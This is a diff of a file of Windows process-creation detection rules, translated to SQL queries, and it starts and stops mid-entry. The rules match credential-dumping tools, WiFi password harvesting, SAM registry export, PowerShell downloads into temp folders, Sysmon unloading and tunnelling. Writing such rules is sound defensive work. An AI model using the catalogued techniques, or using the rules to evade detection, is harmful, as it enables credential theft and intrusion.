"attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\GfxDownloadWrapper.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%gameplayapi.intel.com%' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\GfxDownloadWrapper.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\igfxEM.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\QuarksPwDump.exe' ESCAPE '\\' OR CommandLine IN (' -dhl', ' --dump-hash-local', ' -dhdc', ' --dump-hash-domain-cached', ' --dump-bitlocker', ' -dhd ', ' --dump-hash-domain ', '--ntds-file')))" ], - "filename": "proc_creation_win_lolbin_gfxdownloadwrapper_file_download.yml" + "filename": "proc_creation_win_hktl_quarks_pwdump.yml" }, { - "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet", - "id": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", - "status": "experimental", - "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Share And Session Enumeration Using Net.EXE", + "id": "62510e69-616b-4078-b371-847da438cc03", + "status": "stable", + "description": "Detects attempts to enumerate file shares, printer shares and sessions using \"net.exe\" with the \"view\" flag.", + "author": "Endgame, JHasenbusch (ported for oscd.community)", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.discovery", + "attack.t1018" ], "falsepositives": [ - "Unknown" + "Legitimate use of net.exe utility by legitimate user" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%D;;%' ESCAPE '\\' AND (CommandLine LIKE '%;;;IU%' ESCAPE '\\' OR CommandLine LIKE '%;;;SU%' ESCAPE '\\' OR CommandLine LIKE '%;;;BA%' ESCAPE '\\' OR CommandLine LIKE '%;;;SY%' ESCAPE '\\' OR CommandLine LIKE '%;;;WD%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '%view%' ESCAPE '\\') AND NOT (CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_service_dacl_modification_set_service.yml" + "filename": "proc_creation_win_net_share_and_sessions_enum.yml" }, { - "title": "Harvesting Of Wifi Credentials Via Netsh.EXE", - "id": "42b1a5b8-353f-4f10-b256-39de4467faff", + "title": "Execution via CL_Invocation.ps1", + "id": "a0459f02-ac51-4c09-b511-b8c9203fc429", "status": "test", - "description": "Detect the harvesting of wifi credentials using netsh.exe", - "author": "Andreas Hunkeler (@Karneades), oscd.community", + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.t1040" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%wlan%' ESCAPE '\\' AND CommandLine LIKE '% s%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '% k%' ESCAPE '\\' AND CommandLine LIKE '%=clear%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND CommandLine LIKE '%SyncInvoke%' ESCAPE '\\')" ], - "filename": "proc_creation_win_netsh_wifi_credential_harvesting.yml" + "filename": "proc_creation_win_lolbin_cl_invocation.yml" }, { - "title": "Exports Critical Registry Keys To a File", - "id": "82880171-b475-4201-b811-e9c826cd5eaa", - "status": "test", - "description": "Detects the export of a crital Registry key to a file.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "title": "Suspicious Invoke-WebRequest Execution", + "id": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", + "status": "experimental", + "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1012" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\') AND (CommandLine LIKE '% -ur%' ESCAPE '\\' OR CommandLine LIKE '% -o%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regedit_export_critical_keys.yml" + "filename": "proc_creation_win_powershell_invoke_webrequest_download.yml" }, { - "title": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE", - "id": "455b9d50-15a1-4b99-853f-8d37655a4c1b", - "status": "experimental", - "description": "Detects active directory enumeration activity using known AdFind CLI flags", - "author": "frack113", + "title": "Suspicious Child Process Created as System", + "id": "590a5f4c-6c8c-4f10-8307-89afe9453a9d", + "status": "test", + "description": "Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts", + "author": "Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.privilege_escalation", + "attack.t1134.002" ], "falsepositives": [ - "Authorized administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%lockoutduration%' ESCAPE '\\' OR CommandLine LIKE '%lockoutthreshold%' ESCAPE '\\' OR CommandLine LIKE '%lockoutobservationwindow%' ESCAPE '\\' OR CommandLine LIKE '%maxpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdlength%' ESCAPE '\\' OR CommandLine LIKE '%pwdhistorylength%' ESCAPE '\\' OR CommandLine LIKE '%pwdproperties%' ESCAPE '\\') OR CommandLine LIKE '%-sc admincountdmp%' ESCAPE '\\' OR CommandLine LIKE '%-sc exchaddresses%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (ParentUser LIKE '%\\\\NETWORK SERVICE' ESCAPE '\\' OR ParentUser LIKE '%\\\\LOCAL SERVICE' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%\\\\SYSTEM' ESCAPE '\\' OR User LIKE '%\\\\Système' ESCAPE '\\' OR User LIKE '%\\\\СИСТЕМА' ESCAPE '\\') AND IntegrityLevel = 'System') AND NOT ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%DavSetCookie%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_adfind_enumeration.yml" + "filename": "proc_creation_win_susp_child_process_as_system_.yml" }, { - "title": "Suspicious PowerShell Mailbox Export to Share", - "id": "889719ef-dd62-43df-86c3-768fb08dc7c0", + "title": "PsExec Service Execution", + "id": "fdfcbd78-48f1-4a4b-90ac-d82241e368c5", "status": "experimental", - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution", + "author": "Thomas Patzke, Romaissa Adjailia, Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate administrative tasks" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND CommandLine LIKE '% -Mailbox %' ESCAPE '\\' AND CommandLine LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' OR OriginalFileName = 'psexesvc.exe'))" ], - "filename": "proc_creation_win_powershell_mailboxexport_share.yml" + "filename": "proc_creation_win_sysinternals_psexesvc.yml" }, { - "title": "Potential Active Directory Enumeration Using AD Module - ProcCreation", - "id": "70bc5215-526f-4477-963c-a47a5c9ebd12", - "status": "experimental", - "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", - "author": "frack113", + "title": "PUA - NirCmd Execution As LOCAL SYSTEM", + "id": "d9047477-0359-48c9-b8c7-792cedcdc9c4", + "status": "test", + "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.reconnaissance", - "attack.discovery", - "attack.impact" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Legitimate use by administrators" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Import-Module %' ESCAPE '\\' OR CommandLine LIKE '%ipmo %' ESCAPE '\\') AND CommandLine LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% runassystem %' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_active_directory_module_dll_import.yml" + "filename": "proc_creation_win_pua_nircmd_as_system.yml" }, { - "title": "Base64 Encoded PowerShell Command Detected", - "id": "e32d4572-9826-4738-b651-95fa63747e8a", + "title": "Renamed PAExec Execution", + "id": "c4e49831-1496-40cf-8ce1-b53f942b02f9", "status": "test", - "description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of renamed version of PAExec. Often used by attackers", + "author": "Florian Roth (Nextron Systems), Jason Lynch", "tags": [ - "attack.t1027", "attack.defense_evasion", - "attack.t1140", - "attack.t1059.001" + "attack.t1202" ], "falsepositives": [ - "Administrative script libraries" + "Weird admins that rename their tools", + "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", + "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%::FromBase64String(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'PAExec Application' OR OriginalFileName = 'PAExec.exe' OR Product LIKE '%PAExec%' ESCAPE '\\' OR Imphash IN ('11D40A7B7876288F919AB819CC2D9802', '6444f8a34e99b8f7d9647de66aabe516', 'dfd6aa3f7b2b1035b76b718f1ddc689f', '1a6cca4d5460b1710a12dea39e4a592c') OR (Hashes LIKE '%IMPHASH=11D40A7B7876288F919AB819CC2D9802%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6444f8a34e99b8f7d9647de66aabe516%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1a6cca4d5460b1710a12dea39e4a592c%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\paexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\PAExec-%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_frombase64string.yml" + "filename": "proc_creation_win_renamed_paexec.yml" }, { - "title": "Lolbin Defaultpack.exe Use As Proxy", - "id": "b2309017-4235-44fe-b5af-b15363011957", + "title": "Msiexec Quiet Installation", + "id": "79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5", "status": "experimental", - "description": "Detect usage of the \"defaultpack.exe\" binary as a proxy to launch other programs", + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", "author": "frack113", "tags": [ - "attack.t1218", "attack.defense_evasion", - "attack.execution" + "attack.t1218.007" ], "falsepositives": [ - "Unknown" + "WindowsApps installing updates via the quiet flag" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\defaultpack.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName = 'msiexec.exe') AND (CommandLine LIKE '%/i%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/package%' ESCAPE '\\' OR CommandLine LIKE '%-package%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/j%' ESCAPE '\\' OR CommandLine LIKE '%-j%' ESCAPE '\\') AND (CommandLine LIKE '%/q%' ESCAPE '\\' OR CommandLine LIKE '%-q%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\Ccm32BitLauncher.exe' ESCAPE '\\' AND IntegrityLevel = 'System')))" ], - "filename": "proc_creation_win_lolbin_defaultpack.yml" + "filename": "proc_creation_win_msiexec_install_quiet.yml" }, { - "title": "Suspicious Shells Spawn by Java Utility Keytool", - "id": "90fb5e62-ca1f-4e22-b42e-cc521874c938", + "title": "Arbitrary File Download Via MSPUB.EXE", + "id": "3b3c7f55-f771-4dd6-8a6e-08d057a17caf", "status": "experimental", - "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", - "author": "Andreas Hunkeler (@Karneades)", + "description": "Detects usage of \"MSPUB\" (Microsoft Publisher) to download arbitrary files", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.execution", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\keytool.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR OriginalFileName = 'MSPUB.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_java_keytool_susp_child_process.yml" + "filename": "proc_creation_win_lolbin_mspub_download.yml" }, { - "title": "Suspicious Plink Port Forwarding", - "id": "48a61b29-389f-4032-b317-b30de6b95314", + "title": "Potential Encoded PowerShell Patterns In CommandLine", + "id": "cdf05894-89e7-4ead-b2b0-0a5f97a90f2f", "status": "test", - "description": "Detects suspicious Plink tunnel port forwarding to a local port", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects specific combinations of encoding methods in PowerShell via the commandline", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Administrative activity using a remote port forwarding to a local port" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Description = 'Command-line SSH, Telnet, and Rlogin client' AND CommandLine LIKE '% -R %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (((CommandLine LIKE '%ToInt%' ESCAPE '\\' OR CommandLine LIKE '%ToDecimal%' ESCAPE '\\' OR CommandLine LIKE '%ToByte%' ESCAPE '\\' OR CommandLine LIKE '%ToUint%' ESCAPE '\\' OR CommandLine LIKE '%ToSingle%' ESCAPE '\\' OR CommandLine LIKE '%ToSByte%' ESCAPE '\\') AND (CommandLine LIKE '%ToChar%' ESCAPE '\\' OR CommandLine LIKE '%ToString%' ESCAPE '\\' OR CommandLine LIKE '%String%' ESCAPE '\\')) OR ((CommandLine LIKE '%char%' ESCAPE '\\' AND CommandLine LIKE '%join%' ESCAPE '\\') OR (CommandLine LIKE '%split%' ESCAPE '\\' AND CommandLine LIKE '%join%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_plink_port_forwarding.yml" + "filename": "proc_creation_win_powershell_encoding_patterns.yml" }, { - "title": "PUA - NirCmd Execution As LOCAL SYSTEM", - "id": "d9047477-0359-48c9-b8c7-792cedcdc9c4", + "title": "Sysmon Driver Unloaded Via Fltmc.EXE", + "id": "4d7cda18-1b12-4e52-b45c-d28653210df8", "status": "test", - "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects possible Sysmon filter driver unloaded via fltmc.exe", + "author": "Kirill Kiryanov, oscd.community", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562", + "attack.t1562.002" ], "falsepositives": [ - "Legitimate use by administrators" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% runassystem %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND (CommandLine LIKE '%unload%' ESCAPE '\\' AND CommandLine LIKE '%sysmon%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nircmd_as_system.yml" + "filename": "proc_creation_win_fltmc_unload_driver_sysmon.yml" }, { - "title": "HackTool - SysmonEOP Execution", - "id": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", + "title": "Potential Binary Impersonating Sysinternals Tools", + "id": "7cce6fc8-a07f-4d84-a53e-96e1879843c9", "status": "experimental", - "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects binaries that use the same name as legitimate sysinternals tools to evade detection", + "author": "frack113", "tags": [ - "cve.2022.41120", - "attack.t1068", - "attack.privilege_escalation" + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SysmonEOP.exe' ESCAPE '\\' OR Hashes IN ('IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5', 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC') OR Imphash IN ('22f4089eb8aba31e1bb162c6d9bf72e5', '5123fa4c4384d431cd0d893eeb49bbec')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\accesschk64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AccessEnum.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADInsight.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADInsight64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\adrestore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\adrestore64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Autologon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Autologon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Autoruns.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Autoruns64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\autorunsc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\autorunsc64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Bginfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Bginfo64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Cacheset.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Cacheset64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Clockres.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Clockres64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Contig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Contig64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Coreinfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Coreinfo64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CPUSTRES.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CPUSTRES64.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ctrl2cap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Dbgview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dbgview64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktops.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktops64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\disk2vhd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\disk2vhd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\diskext.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\diskext64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Diskmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Diskmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DiskView.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DiskView64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\du.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\du64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\efsdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\FindLinks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\FindLinks64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hex2dec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hex2dec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\junction.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\junction64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ldmdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\listdlls.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\listdlls64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\loadOrd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\loadOrd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\loadOrdC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\loadOrdC64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\logonsessions.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\logonsessions64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\movefile.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\movefile64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notmyfault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notmyfault64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notmyfaultc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notmyfaultc64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntfsinfo.exe' ESCAPE '\\' OR NewProcessName LIKE 